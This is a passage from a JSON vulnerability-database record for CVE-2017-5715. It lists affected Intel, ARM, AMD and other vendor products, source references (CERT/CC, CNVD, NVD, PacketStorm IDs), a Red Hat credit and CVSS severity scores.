      },
      {
        "_id": null,
        "model": "xeon e5 2630l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4020y"
      },
      {
        "_id": null,
        "model": "xeon e5 2637",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1245 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3955"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2803"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v4"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w5590"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7230"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5508"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "661"
      },
      {
        "_id": null,
        "model": "xeon e5 2609 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2820qm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4950hq"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6440hq"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820hk"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "750s"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3380m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690s"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6350hq"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6440eq"
      },
      {
        "_id": null,
        "model": "xeon e3 12201 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1235",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1240l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2650l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5550u"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7235"
      },
      {
        "_id": null,
        "model": "xeon e3 1505m v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4170t"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3740d"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142"
      },
      {
        "_id": null,
        "model": "xeon e3 1276 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660um"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "370m"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3538"
      },
      {
        "_id": null,
        "model": "xeon e5 2630l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2609 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2860"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l3406"
      },
      {
        "_id": null,
        "model": "xeon e3 1505l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3517ue"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300u"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5550"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1535m_v6"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v4"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v3"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5690"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2515e"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138f"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570t"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3220t"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8156"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3210"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2450m"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5504"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8170"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2629m"
      },
      {
        "_id": null,
        "model": "xeon e5 2450l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4130"
      },
      {
        "_id": null,
        "model": "cortex-a",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": "75"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2410m"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7660u"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4114"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4100"
      },
      {
        "_id": null,
        "model": "xeon e5 1660 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 1660 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2808"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4120u"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4030y"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2467m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3337u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820hq"
      },
      {
        "_id": null,
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j2850"
      },
      {
        "_id": null,
        "model": "xeon e3 1230",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570s"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4655_v3"
      },
      {
        "_id": null,
        "model": "core m5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y54"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5700eq"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697a_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5775c"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e6540"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y75"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600k"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8700k"
      },
      {
        "_id": null,
        "model": "xeon e5 2628l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2630 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110e"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v3"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5015u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700hq"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2102"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4402e"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4510u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "975"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3736f"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3308"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2520"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3339y"
      },
      {
        "_id": null,
        "model": "xeon e3 1225 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3450"
      },
      {
        "_id": null,
        "model": "xeon e5 2403",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700t"
      },
      {
        "_id": null,
        "model": "xeon e3 1270 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1285 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2390t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5650u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2870"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3736g"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3350"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5506"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v2"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4112e"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5700hq"
      },
      {
        "_id": null,
        "model": "communications diameter signaling router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.1"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6167u"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2100"
      },
      {
        "_id": null,
        "model": "xeon e5 1428l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2648l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7520"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4400e"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100t"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3775"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540um"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v3"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5507"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3230m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670t"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2806"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5638"
      },
      {
        "_id": null,
        "model": "xeon e3 1280 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1285 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210h"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v3"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 1630 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3958"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6685r"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4760hq"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4030u"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3229y"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160m"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3405"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8400"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4785t"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5640"
      },
      {
        "_id": null,
        "model": "core m5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y57"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "680um"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670"
      },
      {
        "_id": null,
        "model": "xeon e3 1240 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 1650 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7250"
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "amd",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "apple",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "dell",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "dell emc",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "fortinet",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hp",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "qualcomm incorporated",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "suse linux",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "vmware",
        "version": null
      },
      {
        "_id": null,
        "model": "windows sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "_id": null,
        "model": "internet explorer",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "11"
      },
      {
        "_id": null,
        "model": "windows",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "8.1"
      },
      {
        "_id": null,
        "model": null,
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "v8"
      },
      {
        "_id": null,
        "model": "windows",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "10"
      },
      {
        "_id": null,
        "model": "edge",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "_id": null,
        "model": "xeon cpu e5-1650",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "intel",
        "version": "v3"
      },
      {
        "_id": null,
        "model": "cortex a57",
        "scope": null,
        "trust": 0.6,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "pro a8-9600 r7",
        "scope": null,
        "trust": 0.6,
        "vendor": "amd",
        "version": null
      },
      {
        "_id": null,
        "model": "compute cores 4c+6g",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "amd",
        "version": "10"
      },
      {
        "_id": null,
        "model": "fx -8320 eight-core processor",
        "scope": null,
        "trust": 0.6,
        "vendor": "amd",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00302"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5715"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "145710"
      },
      {
        "db": "PACKETSTORM",
        "id": "145650"
      },
      {
        "db": "PACKETSTORM",
        "id": "145653"
      },
      {
        "db": "PACKETSTORM",
        "id": "146008"
      },
      {
        "db": "PACKETSTORM",
        "id": "145673"
      },
      {
        "db": "PACKETSTORM",
        "id": "145635"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2017-5715",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 1.9,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "id": "CVE-2017-5715",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 1.0,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "CNVD-2018-00302",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "VHN-113918",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.1,
            "id": "CVE-2017-5715",
            "impactScore": 4.0,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2017-5715",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2017-5715",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-00302",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-113918",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00302"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113918"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5715"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5715"
      }
    ]
  },
  "description": {
    "_id": null,
